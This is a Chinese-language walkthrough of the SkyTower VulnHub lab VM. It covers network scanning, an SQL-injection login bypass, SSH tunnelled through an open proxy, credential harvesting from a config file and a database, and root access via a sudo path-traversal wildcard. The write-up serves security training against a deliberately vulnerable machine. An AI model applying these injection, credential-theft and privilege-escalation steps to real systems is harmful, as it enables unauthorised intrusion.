一、安裝配置靶機

下載地址:

SkyTower: 1 ~ VulnHub

下載之后解壓發(fā)現(xiàn)是VirtualBox格式的

我們下載一個VirtualBox，這是官網(wǎng)

Downloads – Oracle VirtualBox

安裝到默認路徑就

打開后點擊注冊

選擇解壓后的vbox文件

然后點擊左上角管理

點擊導(dǎo)出虛擬電腦，選中后下一步更改路徑，然后一直下一步

就得到了一個鏡像文件

用vmware打開

默認網(wǎng)卡模式為僅主機，更改為NAT模式

C段掃描獲得IP

arp-scan -l

端口掃描一下發(fā)現(xiàn)22，80，3128

nmap 192.168.230.128

訪問一下80端口

發(fā)現(xiàn)一個登錄框

發(fā)現(xiàn)登錄框，我們測sql注入

郵箱隨便輸入一個，密碼我們輸入

123' 1=1#

登錄成功發(fā)現(xiàn)賬號密碼

想到遠程連接22端口

發(fā)現(xiàn)無效

想到3128端口嘗試掛上代理連接

vim /etc/proxychains4.conf

proxychains ssh john@192.168.230.128 -t "/bin/sh"

登錄成功

開始提權(quán)

sudo -l

發(fā)現(xiàn)沒有可以提權(quán)的

想到了80端口界面存在sql注入

cat /var/www/login.php

發(fā)現(xiàn)數(shù)據(jù)庫信息

登錄成功

mysql -u root SkyTech -p

查看數(shù)據(jù)庫信息

show databases；

逐個查看找到

use SkyTech;
show tables;

得到賬號密碼

select * from login

ssh登錄

proxychains ssh sara@192.168.230.128 -t "/bin/sh"

sudo -l

得到/accounts/*有權(quán)限

pwd

發(fā)現(xiàn)在根目錄下

sudo ls /accounts/../root

查看一下

sudo cat /accounts/../root/flag.txt

得到root密碼

遠程連接提權(quán)成功

proxychains ssh root@192.168.230.128 -t "/bin/sh"